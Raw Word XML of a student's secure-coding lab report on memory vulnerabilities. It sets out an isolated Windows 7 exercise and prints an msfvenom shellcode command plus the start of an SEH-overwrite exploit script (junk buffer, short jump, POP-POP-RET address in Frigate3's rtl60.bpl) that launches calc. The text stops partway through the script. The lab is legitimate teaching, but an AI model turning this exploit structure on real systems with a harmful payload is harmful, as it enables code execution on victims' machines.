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E57623" w14:textId="751DA2C2" w:rsidR="00653A2A" w:rsidRPr="00653A2A" w:rsidRDefault="00653A2A" w:rsidP="00653A2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Centaur" w:hAnsi="Centaur"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00653A2A">
        <w:rPr>
          <w:rFonts w:ascii="Centaur" w:hAnsi="Centaur"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>CSE-2010 SECURE CODING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3A9A3C" w14:textId="053FB07D" w:rsidR="00653A2A" w:rsidRPr="00653A2A" w:rsidRDefault="002643D4" w:rsidP="00653A2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Centaur" w:hAnsi="Centaur"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Centaur" w:hAnsi="Centaur"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>NAME: K V P S GANESH M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CEC868" w14:textId="5539C4CD" w:rsidR="00653A2A" w:rsidRDefault="002643D4" w:rsidP="00653A2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Centaur" w:hAnsi="Centaur"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Centaur" w:hAnsi="Centaur"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>REGISTRATION NUMBER: 19BCN7073</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0A67FCAB" w14:textId="5254D34F" w:rsidR="003D6662" w:rsidRPr="00653A2A" w:rsidRDefault="003D6662" w:rsidP="00653A2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Centaur" w:hAnsi="Centaur"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Centaur" w:hAnsi="Centaur"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SLOT L23+L24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCE6064" w14:textId="77F46041" w:rsidR="00653A2A" w:rsidRPr="00653A2A" w:rsidRDefault="00653A2A" w:rsidP="00653A2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Centaur" w:hAnsi="Centaur"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00653A2A">
        <w:rPr>
          <w:rFonts w:ascii="Centaur" w:hAnsi="Centaur"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>LAB EXPERIMENT 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F1D044" w14:textId="77777777" w:rsidR="00653A2A" w:rsidRPr="00653A2A" w:rsidRDefault="00653A2A" w:rsidP="00653A2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Centaur" w:hAnsi="Centaur"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18CF9959" w14:textId="77777777" w:rsidR="00653A2A" w:rsidRDefault="00653A2A" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594C45DB" w14:textId="64FD9A53" w:rsidR="00D632A7" w:rsidRDefault="00130FC5" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004155BE">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lab experiment - Working with the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="004F6810">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Part II</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492D56AF" w14:textId="77777777" w:rsidR="004B7776" w:rsidRDefault="004B7776" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F52FE1" w14:textId="5AC16ADC" w:rsidR="004B7776" w:rsidRDefault="004B7776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 xml:space="preserve">Task </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58753730" w14:textId="76A37ABF" w:rsidR="004B7776" w:rsidRPr="004B7776" w:rsidRDefault="004B7776" w:rsidP="004B7776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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Download Vulln.zip from teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEBDE9D" w14:textId="1104A4CE" w:rsidR="004B7776" w:rsidRPr="004B7776" w:rsidRDefault="004B7776" w:rsidP="004B7776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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy a virtual </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 instance and copy the Vulln.zip into it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A331DC4" w14:textId="2B9C15BC" w:rsidR="004B7776" w:rsidRPr="004B7776" w:rsidRDefault="004B7776" w:rsidP="004B7776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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unzip the zip file. You will find two files named exploit.py and Vuln_Program_Stream.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F28703B" w14:textId="7FBEA41F" w:rsidR="004B7776" w:rsidRPr="004B7776" w:rsidRDefault="004B7776" w:rsidP="004B7776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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Download and install python 2.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 3.5.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB406F" w14:textId="11FA789A" w:rsidR="004B7776" w:rsidRPr="004B7776" w:rsidRDefault="004B7776" w:rsidP="5326DA1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5326DA1B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Run the exploit script</w:t>
      </w:r>
      <w:r w:rsidR="004F6810" w:rsidRPr="5326DA1B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> II (exploit2.py</w:t>
      </w:r>
      <w:r w:rsidR="00B638A4" w:rsidRPr="5326DA1B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- check today’s folder</w:t>
      </w:r>
      <w:r w:rsidR="004F6810" w:rsidRPr="5326DA1B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="5326DA1B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to generate the payload</w:t>
      </w:r>
      <w:r w:rsidR="13BFA56E" w:rsidRPr="5326DA1B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03685C76" w14:textId="10820FEC" w:rsidR="13BFA56E" w:rsidRDefault="13BFA56E" w:rsidP="5326DA1B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 w:rsidRPr="5326DA1B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Replace the shellcode in the exploit2.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBA8BA0" w14:textId="4EF81E76" w:rsidR="004B7776" w:rsidRPr="004B7776" w:rsidRDefault="004B7776" w:rsidP="004B7776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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Install Vuln_Program_Stream.exe and Run the same</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5821D" w14:textId="77777777" w:rsidR="004B7776" w:rsidRDefault="004B7776" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44ACE8CF" w14:textId="69396D1C" w:rsidR="004B7776" w:rsidRDefault="004B7776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 xml:space="preserve">Analysis </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF5AB7E" w14:textId="47B05479" w:rsidR="004F6810" w:rsidRDefault="00D276D8" w:rsidP="004B7776">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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Try to c</w:t>
      </w:r>
      <w:r w:rsidR="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>rash</w:t>
      </w:r>
      <w:r w:rsidR="004B7776" w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B7776" w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vuln_Program_Stream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B7776" w:rsidRPr="004B7776">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> program and </w:t>
      </w:r>
      <w:r w:rsidR="004F6810">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1BBC2A" w14:textId="02A517C4" w:rsidR="004B7776" w:rsidRDefault="004F6810" w:rsidP="004B7776">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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 xml:space="preserve">Change the default trigger from cmd.exe to calc.exe (Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0007091B">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F43DF1" w14:textId="77777777" w:rsidR="00A748C0" w:rsidRDefault="00A748C0" w:rsidP="00A748C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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 xml:space="preserve">Example: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128D5E8C" w14:textId="433A985F" w:rsidR="00613C56" w:rsidRDefault="00613C56" w:rsidP="00A748C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00613C56">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00613C56">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a x86 --platform windows -p windows/exec CMD=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00613C56">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>calc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00613C56">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00613C56">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>alpha_mixed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00613C56">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -b "\x00\x14\x09\x0a\x0d</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00613C56">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00613C56">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>f python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A144749" w14:textId="3A4FFB63" w:rsidR="004F6810" w:rsidRDefault="004F6810" w:rsidP="004B7776">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Change the default trigger to open control panel. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A18349" w14:textId="04F410A6" w:rsidR="004B7776" w:rsidRDefault="004B7776" w:rsidP="004B7776">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222F5DA3" w14:textId="68BAE320" w:rsidR="004B7776" w:rsidRPr="004B7776" w:rsidRDefault="004B7776" w:rsidP="004B7776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Happy Learning!!!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685DFB24" w14:textId="78787EC6" w:rsidR="004B7776" w:rsidRDefault="004B7776" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F2A220" w14:textId="77777777" w:rsidR="007C675E" w:rsidRDefault="007C675E" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384284EF" w14:textId="7902AE53" w:rsidR="007C675E" w:rsidRDefault="007C675E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Initially the code has some bugs so the correct code after correcting the bugs is as follows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AF45C7" w14:textId="788258C5" w:rsidR="007C675E" w:rsidRDefault="007B1918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  <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">TASK 1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>( Trigger</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CMD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68057BD9" w14:textId="77777777" w:rsidR="007C675E" w:rsidRDefault="007C675E" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="356D1444" w14:textId="436AED02" w:rsidR="007C675E" w:rsidRDefault="007C675E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Exploit2.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3C55BB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r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t># -*- coding: cp1252 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B1DFF1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</w:p>
    <w:p w14:paraId="7FE907E0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r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>junk="A" * 4112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E008B9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</w:p>
    <w:p w14:paraId="12BB6DDD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nseh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>="\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>xeb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>\x20\x90\x90"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7263CB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</w:p>
    <w:p w14:paraId="2E6B388A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seh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>="\x4B\x0C\x01\x40"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6264DF25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</w:p>
    <w:p w14:paraId="52D1868D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r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>#40010C4B   5B               POP EBX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B23AF95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r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>#40010C4C   5D               POP EBP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3313B13C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r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>#40010C4D   C3               RETN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158316ED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r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">#POP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>EBX ,POP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> EBP, RETN | [rtl60.bpl]  (C:\Program Files\Frigate3\rtl60.bpl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61134A8D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</w:p>
    <w:p w14:paraId="3C1FF5DD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nops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>="\x90" * 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3127F5AE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</w:p>
    <w:p w14:paraId="6508D83E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r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>msfvenom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-a x86 --platform windows -p windows/exec CMD=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>calc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-e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>alpha_mixed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-b "\x00\x14\x09\x0a\x0d</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>"  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C675E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
